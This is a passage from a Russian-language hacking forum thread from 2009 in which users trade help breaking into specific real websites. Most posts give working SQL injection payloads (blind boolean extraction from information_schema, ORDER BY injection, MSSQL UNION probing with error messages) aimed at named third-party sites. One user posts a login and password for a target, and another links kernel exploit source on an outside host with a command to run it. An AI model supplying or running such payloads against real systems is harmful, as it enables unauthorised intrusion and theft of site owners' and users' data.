Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    mailbrush, пробуй другие, на милворме полно аналогичных
     
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Только эти аналогичные не хотят компилиться нигде...
     
  3. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    Можно ли тут чтонить зделать тут ? у меня невышло =\
    lineager.ru/lwdb/index.php?part=items&id=1+and+79=79
     
  4. WNZRS

    WNZRS Member

    Joined:
    3 Sep 2009
    Messages:
    294
    Likes Received:
    52
    Reputations:
    1
    нельзя, там фильтруется
     
  5. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    С запятыми не пашет вроде

    http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1+offset+1)+from+1+for+1))>1
     
    2 people like this.
  6. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://lineager.ru/lwdb/index.php?part=items&id=1+and+5=@@version--

    ЫЫ
     
    _________________________
    1 person likes this.
  7. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    нет отдает 404 на файлы.
    --
    у меня вопрос нужно запретить запуск пхп скрптов,в папке,можно сделать это через htaccess?спасибо!
    -уже нашел)
    Code:
    RemoveHandler .php .phtml .php3
    AddType application/x-httpd-php-source .php .phtml .php3
     
    #9007 Shadrin, 26 Sep 2009
    Last edited: 26 Sep 2009
  8. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    chmod 777 exploit.so;./exploit.so
    ибо в твоем случае через пулсаудио файл не запустился.

    --------------------------
    http://fsb-my.name/c/exploit.c
    http://fsb-my.name/c/pwnkernel.c
    http://fsb-my.name/c/run.sh
     
    1 person likes this.
  9. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&page=1{SQL-INJ}

    Можно ли раскрутить? Если да то как? А то никак не пойму как крутить такую скулю крутить
     
  10. LzD

    LzD Banned

    Joined:
    24 Jul 2009
    Messages:
    51
    Likes Received:
    12
    Reputations:
    2
    фак читай от джока :(
     
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Инъекция в ORDER BY.

    Эм... Что за exploit.so и где его взять? Он в результате запуска этого эксплоита должен создаться? И что за пулсаудио (гугл говорит, что голосвая система, но это бред=\ )?
     
    1 person likes this.
  12. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    ошибка базы ? (
    Это иньект в ордере ... только толку от него



    Соре mailbrush опередил
     
    #9012 S00pY, 26 Sep 2009
    Last edited: 26 Sep 2009
    1 person likes this.
  13. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    а как в таком случае правильно выводить данные ? т.е. как мне узнать какому символу соответсвует запрос ?
     
  14. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    По логике < >,а потом сравнением и смотрим по ascii табле символ
    forum.antichat.ru/thread119047.html
     
    4 people like this.
  15. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1+offset+n)+from+1+ for+1))>1

    n=0 – первая таблица
    n=1 – вторая таблица
    n=2 – третья таблица и тд

    http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1+offset+1)+from+n+ for+1))>1

    n=1 – первый символ
    n=2 – второй символ
    n=3 – третий символ и тд

    Автоматизируй процесс – накатай скрипт. Или уже готовый заюзай, тут где-то недалеко лежал

    ЗЫ базу задротов тебе врятле удастся достать – л2 сервер работает под mssql (если не джава) и как правило доступ к табличкам пользователей имеет только сервер авторизации (или как там он называется не помню уже …). Хотя всякое бывает
     
    2 people like this.
  16. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    more than 1 row

    http://takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&page=1,if(substring(version(),1,1)=5,1,(select+column_name+from+information_schema.columns))

    ну и соответственно далее как обычно

    http://takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&page=1,if(ASCII(SUBSTRING((SELECT+table_name+FROM+information_schema.tables+LIMIT+16,1),1,1))<102,1,(select+column_name+from+information_schema.columns))

    ============================
     
    2 people like this.
  17. bumerok

    bumerok New Member

    Joined:
    25 Sep 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Помогите разобраться с MSSQL injection

    Имеем:

    SQL
    ?id=496'

    Microsoft OLE DB Provider for SQL Server error '80040e14'
    Unclosed quotation mark before the character string ''.

    SQL
    ?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES--

    Microsoft OLE DB Provider for SQL Server error '80040e14'
    All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

    SQL
    ?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME,1+FROM+INFORMATION_SCHEMA.TABLES--

    Microsoft OLE DB Provider for SQL Server error '80040e07'
    Operand type clash: ntext is incompatible with int

    SQL
    ?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME,'a'+FROM+INFORMATION_SCHEMA.TABLES--

    Microsoft OLE DB Provider for SQL Server error '80040e14'
    All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

    добавляем поля пока эта ошибка не пропадет...

    SQL
    ?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME,'a',1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+INFORMATION_SCHEMA.TABLES--

    ошибок не дает, но и ничего и не выводит

    Подскажите пожалуйста куда дальше рыть, или может я уже где-то туплю?
     
  18. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    0o
    Незадумывался : (....
     
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    bumerok
    рыть лучше вот сюда:
    https://forum.antichat.ru/thread30501.html

    А если нужен конкретный ответ по конкретной скуле, то давай линк, гадание на операторах и конструкциях в теме ни к чему.
     
    1 person likes this.
  20. bumerok

    bumerok New Member

    Joined:
    25 Sep 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    jokester

    вот линк
    тока нужно залогинится

    log: bugsrc
    pas: qwer1234

    http://www.zapoznanie.pl/member/events_more_frame.asp?event_id=496'

    + почему-то из ie8 http 500, a из под ff 3.0.14 нормально
    выводит ошибку
    Microsoft OLE DB Provider for SQL Server error '80040e14'
    Unclosed quotation mark before the character string ''.
     
Thread Status:
Not open for further replies.